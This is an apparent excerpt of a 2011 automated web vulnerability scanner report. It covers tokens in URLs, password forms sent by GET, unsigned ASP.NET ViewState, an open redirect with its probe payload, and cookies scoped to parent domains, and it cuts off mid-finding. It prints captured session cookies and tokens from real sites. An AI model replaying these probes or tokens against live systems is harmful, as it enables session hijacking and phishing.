GET /pview?event=pview&source=share5x&publisher=c6403dd8-336d-401f-a09b-5b7184ac72dc&hostname=www.mimecast.com&location=%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&sessionID=1305203802369.25147&fpc=303c07d-12fe4358101-13064b3c-1&ts1305203804180.0 HTTP/1.1
Host: l.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 12:36:44 GMT
Connection: keep-alive

9.3. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_925756&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.164.62
X-Cnection: close
Date: Thu, 12 May 2011 10:59:39 GMT
Content-Length: 0

10. Password field submitted using GET method previous next
There are 3 instances of this issue:

https://secure.reportingsystem.com/TPG/index.cfm
https://secure.reportingsystem.com/carlyle/
http://www.soundpatheview.com/

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

10.1. https://secure.reportingsystem.com/TPG/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.reportingsystem.com
Path:	/TPG/index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://secure.reportingsystem.com/TPG/index.cfm

The form contains the following password field:

Request

Response

10.2. https://secure.reportingsystem.com/carlyle/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.reportingsystem.com
Path:	/carlyle/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://secure.reportingsystem.com/carlyle/

The form contains the following password field:

Request

GET /carlyle/ HTTP/1.1
Host: secure.reportingsystem.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=1596924; CFTOKEN=63855037; JSESSIONID=2230e705445e33585ac4TR

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:41:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=1596924;HttpOnly;Secure
Set-Cookie: CFTOKEN=63855037;HttpOnly;Secure
Set-Cookie: JSESSIONID=2230e705445e33585ac4TR;HttpOnly;Secure
Expires: {ts '2011-05-12 07:41:10'}
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

<META HTT
...[SNIP]...
<div id="fForm" class="fForm">
<form name="LogIn" id="LogIn">
<INPUT TYPE="text" NAME="userid" id="userid" SIZE="20" MAXLENGTH="100" >
<INPUT TYPE="password" NAME="pwd" id="pwd" SIZE="20" MAXLENGTH="50" >
</form>
...[SNIP]...

10.3. http://www.soundpatheview.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.soundpatheview.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.soundpatheview.com/

The form contains the following password field:

Password

Request

Response

11. ASP.NET ViewState without MAC enabled previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/Login.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /Login.aspx?ReturnUrl=%2fBusyBoxDotNet.axd%3fres%3dmaskBG.png%26noGzip%3d1&res=maskBG.png&noGzip=1 HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
Referer: https://investor.kkr.com/Login.aspx?ReturnUrl=%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

12. Open redirection previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://akatracking.esearchvision.com
Path:	/esi/redirect2.html

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//a54eba6a0f332d8d7/a%3fhttp%3a//ad.doubleclick.net/clk%3b233236047%3b62821348%3bd%3fhttps%3a//personal.vanguard.com/us/funds/snapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 was submitted in the url parameter. This caused a redirection to the following URL:

http://a54eba6a0f332d8d7/a?http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a//a54eba6a0f332d8d7/a%3fhttp%3a//ad.doubleclick.net/clk%3b233236047%3b62821348%3bd%3fhttps%3a//personal.vanguard.com/us/funds/snapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://a54eba6a0f332d8d7/a?http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:15 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:15 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34116
Date: Thu, 12 May 2011 11:01:15 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

13. Cookie scoped to parent domain previous next
There are 90 instances of this issue:

http://convctr.overture.com/images/cc/cc.gif
http://foxbusiness.disqus.com/thread.js
https://personal.vanguard.com/us/funds/snapshot
http://www.dmoc.com/
http://www.elawmarketing.com/
http://www.korteco.com/
https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds
http://ad.amtk-media.com/iframe
http://ad.doubleclick.net/clk
http://ad.turn.com/server/ads.js
http://admeld.adnxs.com/usersync
http://ads.adbrite.com/adserver/vdi/742697
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ads1.revenue.net/j
http://ads1.revenue.net/load/227245/index.html
http://akatracking.esearchvision.com/esi/redirect.html
http://akatracking.esearchvision.com/esi/redirect2.html
http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9
http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php
http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php
http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php
http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php
http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php
http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php
http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php
http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php
http://b.scorecardresearch.com/b
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cf.addthis.com/red/p.json
http://core.insightexpressai.com/adServer/adServerESI.aspx
http://cspix.media6degrees.com/orbserv/hbpix
http://da.newstogram.com/hg.php
http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json
http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json
http://ib.adnxs.com/ptj
http://id.google.com/verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif
http://id.google.com/verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif
http://id.google.com/verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif
http://id.google.com/verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif
http://idpix.media6degrees.com/orbserv/hbpix
http://js.revsci.net/gateway/gw.js
http://m1463.ic-live.com/572/
http://marketing.csscorp.com/acton/bn/1090/visitor.gif
http://meter-svc.nytimes.com/meter.js
http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302
http://odb.outbrain.com/utils/get
http://odb.outbrain.com/utils/ping.html
http://overseebroad.d.chango.com/c/t.js
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js
http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js
http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js
http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js
http://pixel.33across.com/ps/
http://pixel.quantserve.com/pixel
http://r.turn.com/r/bd
http://r.turn.com/r/beacon
http://r.turn.com/server/pixel.htm
http://segments.adap.tv/data/
http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22
http://tags.bluekai.com/site/668
http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html
http://track.ft.com/track/track.js
http://va.px.invitemedia.com/pixel
http://www.csscorp.com/
http://www.nytimes.com/adx/bin/adx_remote.html
https://www.wellsfargo.com/jump/theprivatebank/index

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

13.1. http://convctr.overture.com/images/cc/cc.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://convctr.overture.com
Path:	/images/cc/cc.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SessionData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL1ODi4vzMoDyGQWYGls5OjsZObgYWRq5GAE5xk2YO; domain=.overture.com; path=/; expires=Thu, 12-May-2011 11:20:00 GMT
UserData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL4tCQVIZRZgaWzk6Oxk5uBhZGrkYATspeIQ0%3D; domain=.overture.com; path=/; expires=Sun, 09-May-2021 11:15:00 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/cc/cc.gif?ver=1.0&aID=5819599720&mkt=0&ref= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: convctr.overture.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:00 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Set-Cookie: SessionData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL1ODi4vzMoDyGQWYGls5OjsZObgYWRq5GAE5xk2YO; domain=.overture.com; path=/; expires=Thu, 12-May-2011 11:20:00 GMT
Set-Cookie: UserData=02u3hs9yoaT4tKLixNTUk1sQEAI0NXN1djJ0dTY7UL4tCQVIZRZgaWzk6Oxk5uBhZGrkYATspeIQ0%3D; domain=.overture.com; path=/; expires=Sun, 09-May-2021 11:15:00 GMT
P3P: CP=" NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR STP IND UNI COM NAV INT STA "
Pragma: no-cache
Connection: close
Content-Type: image/gif
Content-Length: 34

GIF89a.............,...........L.;

13.2. http://foxbusiness.disqus.com/thread.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://foxbusiness.disqus.com
Path:	/thread.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sessionid=5439c19bf65868637b6d94bd5708f992; Domain=.disqus.com; expires=Thu, 26-May-2011 11:39:08 GMT; Max-Age=1209600; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thread.js?url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&title=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&sort=&per_page&category_id=462875&developer=0&identifier=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&remote_auth_s2=e30%3D%20c5d5d037748a67e6b04679c3eadc2d7b0b1486fb%201305198974&1305200288779 HTTP/1.1
Host: foxbusiness.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1305161240.15.15.utmcsr=connectedplanetonline.com|utmccn=(referral)|utmcmd=referral|utmcct=/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/; __utma=113869458.1602204697.1303349184.1305126028.1305161240.15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Content-Language: en-us
Vary: Accept-Language,Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: test=1; Path=/
Set-Cookie: sessionid=5439c19bf65868637b6d94bd5708f992; Domain=.disqus.com; expires=Thu, 26-May-2011 11:39:08 GMT; Max-Age=1209600; Path=/
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 8829

/*jslint evil:true */
/**
* Dynamic thread loader
*
*
*
*
*
*
*/

//
var DISQUS;
if (!DISQUS || typeof DISQUS == 'function') {
throw "DISQUS object is not initialized";
}
//

// json
...[SNIP]...

13.3. https://personal.vanguard.com/us/funds/snapshot previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://personal.vanguard.com
Path:	/us/funds/snapshot

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=0000NlNxb4pkRjQ9SuyVJzXRQ-V:15o5flja9; Path=/; Domain=.vanguard.com; Secure
TLTSID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com
TLTUID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com; Expires=Thu, 12-05-2021 11:09:22 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.4. http://www.dmoc.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dmoc.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS97997ab7f65dbfa3475cc6e258e81de7=959b2d7543b91794550623991d8a8d37; expires=Sat, 04-Jun-2011 15:53:02 GMT; path=/; domain=.dmoc.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dmoc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Diserio+Martin+O%27Connor+%26+Castiglioni&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
ETag: "8613988e24a0a3d3f954f30e88bb50ea"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Set-Cookie: SESS97997ab7f65dbfa3475cc6e258e81de7=959b2d7543b91794550623991d8a8d37; expires=Sat, 04-Jun-2011 15:53:02 GMT; path=/; domain=.dmoc.com
Last-Modified: Thu, 12 May 2011 05:21:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

13.5. http://www.elawmarketing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.elawmarketing.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS12e590b5abdc44fd41146e46388173a1=c8f73722530b0816abc1b10d32d412d7; expires=Sat, 04-Jun-2011 15:33:34 GMT; path=/; domain=.elawmarketing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/practice-areas.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS12e590b5abdc44fd41146e46388173a1=c8f73722530b0816abc1b10d32d412d7; expires=Sat, 04-Jun-2011 15:33:34 GMT; path=/; domain=.elawmarketing.com
Last-Modified: Thu, 12 May 2011 12:00:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 48659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...

13.6. http://www.korteco.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.korteco.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS31e5fbde7def436979bdb9291b5781da=kqafn01oinjtbje997dusc7ce2; expires=Sat, 04 Jun 2011 16:44:44 GMT; path=/; domain=.korteco.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:11:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS31e5fbde7def436979bdb9291b5781da=kqafn01oinjtbje997dusc7ce2; expires=Sat, 04 Jun 2011 16:44:44 GMT; path=/; domain=.korteco.com
Last-Modified: Thu, 12 May 2011 12:45:12 GMT
ETag: "66bb27227b2dbbabf0e8363239bdacb3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...

13.7. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.usaa.com
Path:	/inet/imco_mutualfund/ImMutualFunds

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=0001Y8Xm6NLmr5TSgq_ZSnYB1Cq:152vuh6gi; Path=/inet; Domain=.usaa.com
MemberGlobalSession=2:1001:4WCSMG1D143X7EVESDUQU; Path=/; Domain=.usaa.com; Secure
